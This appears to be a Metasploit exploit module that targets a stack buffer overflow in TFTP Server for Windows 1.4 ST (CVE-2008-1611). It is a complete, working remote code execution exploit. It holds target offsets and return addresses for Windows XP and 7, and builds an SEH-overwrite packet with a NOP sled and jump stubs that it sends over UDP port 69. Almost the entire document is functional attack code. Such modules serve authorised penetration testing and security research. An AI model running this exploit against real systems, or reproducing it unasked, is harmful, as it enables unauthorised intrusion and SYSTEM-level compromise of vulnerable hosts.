1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8
  include Msf::Exploit::Remote::Udp
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
15
        'Description' => %q{
16
          This module exploits a vulnerability found in TFTP Server 1.4 ST.  The flaw
17
          is due to the way TFTP handles the filename parameter extracted from a WRQ request.
18
          The server will append the user-supplied filename to TFTP server binary's path
19
          without any bounds checking, and then attempt to check this path with a fopen().
20
          Since this isn't a valid file path, fopen() returns null, which allows the
21
          corrupted data to be used in a strcmp() function, causing an access violation.
22

23
          Since the offset is sensitive to how the TFTP server is launched, you must know
24
          in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'
25
          , and then manually select your target accordingly. A successful attempt will lead
26
          to remote code execution under the context of SYSTEM if run as a service, or
27
          the user if run as a standalone. A failed attempt will result a denial-of-service.
28
        },
29
        'Author' => [
30
          'Mati Aharoni', # Initial discovery, PoC
31
          'Datacut' # Metasploit
32
        ],
33
        'References' => [
34
          [ 'CVE', '2008-1611' ],
35
          [ 'OSVDB', '43785' ],
36
          [ 'BID', '18345' ],
37
          [ 'EDB', '5314' ]
38
        ],
39
        'DefaultOptions' => {
40
          'EXITFUNC' => 'seh',
41
        },
42
        'Payload' => {
43
          'Space' => 600,
44
          'BadChars' => "\x00\x2f",
45
          'StackAdjustment' => -3500
46
        },
47
        'Platform' => 'win',
48
        'Targets' => [
49
          # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.
50
          # possible may work for other service packs and or vista
51
          # Rets = P/P/R from tftpserversp.exe
52
          [ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801, 'Offset' => 1203 } ],
53
          [ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801, 'Offset' => 1487 } ],
54
          [ 'Windows 7 SP0/SP1 EN x64 Service Mode', { 'Ret' => 0x416801, 'Offset' => 1217 } ],
55
          [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801, 'Offset' => 1501 } ],
56
          [ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801, 'Offset' => 1223 } ],
57
          [ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801, 'Offset' => 1507 } ]
58
        ],
59
        'Privileged'	=> false,
60
        'DisclosureDate' => '2008-03-26',
61
        'DefaultTarget' => 4,
62
        'Notes' => {
63
          'Reliability' => UNKNOWN_RELIABILITY,
64
          'Stability' => UNKNOWN_STABILITY,
65
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
66
        }
67
      )
68
    ) # TFTP is installed as a service
69

70
    register_options(
71
      [
72
        Opt::RPORT(69)
73
      ]
74
    )
75
  end
76

77
  def exploit
78
    connect_udp
79

80
    nops = make_nops(50)
81
    lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)
82
    near = "\xe9\x80\xfd\xff\xff"    # jump back 640 bytes to the nop sled
83
    nseh = "\xeb\xf9" + make_nops(2) # jump back 7 bytes to the long jump
84

85
    evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
86
    mode = "netascii"
87

88
    # Send the WRQ packet (header "\x00\x02")
89
    sploit = "\x00\x02" + evil + "\0" + mode + "\0"
90

91
    udp_sock.put(sploit)
92

93
    handler
94
    disconnect_udp
95
  end
96
end
97

98